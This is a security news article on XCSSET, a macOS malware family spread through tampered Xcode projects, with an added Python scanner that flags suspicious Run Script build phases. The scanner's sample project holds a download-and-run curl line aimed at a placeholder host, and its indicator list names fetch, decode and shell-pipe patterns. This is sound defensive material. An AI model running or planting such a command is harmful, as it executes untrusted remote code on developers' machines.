There was a time when Macs were considered safe from malware and other ills. Attackers preferred to go after Windows users simply because there were more of them, so attackers could get more bang for their buck. That has been changing, however, as more people own Macs. The latest sign is a third zero-day attack on macOS in less than a year, one that lets attackers abuse Safari in several ways.
Discovery of Third macOS Zero-Day Attack
Last August, security experts found XCSSET, a zero-day attack that affected Mac developers. It gave attackers access to browser cookies and files. It also left behind website backdoors and made off with information from applications while leaving behind a ransom note. This past March, SentinelOne researchers discovered a library of Trojan code that installed the XCSSET malware on developer Macs.
Trend Micro researchers have now discovered a third instance of XCSSET. It uses two zero-day attacks on macOS: one takes advantage of a flaw to steal cookies, and the other takes advantage of a development version of Safari. The researchers found the attacks to be “quite unusual.”
“Malicious code is injected into local Xcode projects so that when the project is built, the malicious code is run. This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects,” reads a blog post on the Trend Micro website. The researchers believe the attacks could be widespread, as the malware was also identified on VirusTotal sources.
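The paragraph above describes the risk to anyone who builds an Xcode project cloned from a repository they did not author: code placed in the project runs at build time. The article does not say which part of the project XCSSET modifies, so the following is a general pre-build check rather than a signature for that malware. It is an added example, not code from the article or from Trend Micro. It parses an Xcode `project.pbxproj` file (old-style plist text), lists every Run Script build phase (stored as `PBXShellScriptBuildPhase` objects, which is where a project can run arbitrary shell commands during a build), and flags scripts containing download-and-execute or decoding indicators. The sample project text and the indicator list are constructed for illustration.

```python
import re

# Constructed sample: a fragment of an Xcode project.pbxproj with one ordinary
# Run Script phase (a linter) and one that downloads and runs a remote script
# at build time. Neither is taken from the article.
SAMPLE_PBXPROJ = r'''
// !$*UTF8*$!
{
	objects = {
		1A2B3C /* Sources */ = {
			isa = PBXSourcesBuildPhase;
			files = (
			);
		};
		4D5E6F /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "swiftlint --quiet\n";
		};
		7A8B9C /* Run Script */ = {
			isa = PBXShellScriptBuildPhase;
			buildActionMask = 2147483647;
			files = (
			);
			runOnlyForDeploymentPostprocessing = 0;
			shellPath = /bin/sh;
			shellScript = "curl -s https://example.invalid/setup.sh | bash\n";
		};
	};
}
'''

# Escapes used inside quoted strings in project.pbxproj.
_ESCAPES = {"n": "\n", "t": "\t", '"': '"', "\\": "\\"}

# Constructed indicator list: anything that fetches, decodes or evaluates
# content at build time deserves a manual look before the project is built.
SUSPICIOUS_INDICATORS = ("curl ", "wget ", "base64", "eval ", "osascript",
                         "| sh", "| bash", "nohup")


def _unescape(raw):
    """Decode backslash escapes in a pbxproj string literal."""
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(0)), raw)


def extract_shell_script_phases(pbxproj_text):
    """Return one dict (id, name, shell_path, script) per Run Script phase.

    Each PBXShellScriptBuildPhase object is a flat dictionary, so the object
    spans from the nearest preceding '= {' to the next line that is just '};'.
    """
    phases = []
    close_re = re.compile(r"^\s*\};", re.M)
    for m in re.finditer(r"isa\s*=\s*PBXShellScriptBuildPhase;", pbxproj_text):
        head_end = pbxproj_text.rfind("= {", 0, m.start())
        line_start = pbxproj_text.rfind("\n", 0, head_end) + 1
        header = pbxproj_text[line_start:head_end]
        hm = re.match(r"\s*([0-9A-Fa-f]+)\s*(?:/\*\s*(.*?)\s*\*/)?\s*$", header)
        end = close_re.search(pbxproj_text, m.end())
        body = pbxproj_text[m.end():end.start()]
        sp = re.search(r"shellPath\s*=\s*(\S+?);", body)
        ss = re.search(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)";', body, re.S)
        phases.append({
            "id": hm.group(1) if hm else "?",
            "name": hm.group(2) if hm and hm.group(2) else "",
            "shell_path": sp.group(1).strip('"') if sp else "",
            "script": _unescape(ss.group(1)) if ss else "",
        })
    return phases


def flag_suspicious(phases):
    """Return the phases whose script contains any indicator."""
    return [p for p in phases
            if any(ind in p["script"].lower() for ind in SUSPICIOUS_INDICATORS)]


if __name__ == "__main__":
    found = extract_shell_script_phases(SAMPLE_PBXPROJ)
    print(f"{len(found)} Run Script phase(s) found")
    for p in flag_suspicious(found):
        print(f"REVIEW {p['id']} ({p['name']}) via {p['shell_path']}:")
        print("   " + p["script"].strip())
```

Point it at `<project>.xcodeproj/project.pbxproj` in a freshly cloned repository and read every listed script before the first build; the indicator list only narrows attention, so an empty flagged list is not a clean bill of health.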
The researchers detect the entry threat as “TrojanSpy.MacOS.XCSSET.A” and its command-and-control (C&C) related files as “Backdoor.MacOS.XCSSET.A.”
The Harm that XCSSET Causes
The malware creates modified Xcode projects and apps that spread the attack. What isn’t known is how the malware first reaches these Macs. What is known is that the Xcode projects have been modified to run malicious code, which, once it reaches a Mac, leads to user credentials and other information being stolen.
Once it lands on a system, XCSSET can:
- Abuse Safari and other browsers
- Read and dump Safari cookies
- Inject backdoors into the Safari development version through a UXSS attack
- Steal information from apps
- Take screenshots
- Upload user files to the attacker’s server
- Encrypt files
- Show a ransom note
A UXSS (universal cross-site scripting) attack primarily affects browsing. It can:
- Modify websites
- Modify/replace Bitcoin and cryptocurrency addresses
- Steal account credentials
- Steal Apple Store credit card information
- Block the user from changing passwords while stealing modified passwords
- Take screenshots
With three occurrences of the Mac zero-day attack in less than a year, there’s no telling where and when it will hit next. Trend Micro suggests users only download apps from official, legitimate sources and use a multilayer security solution.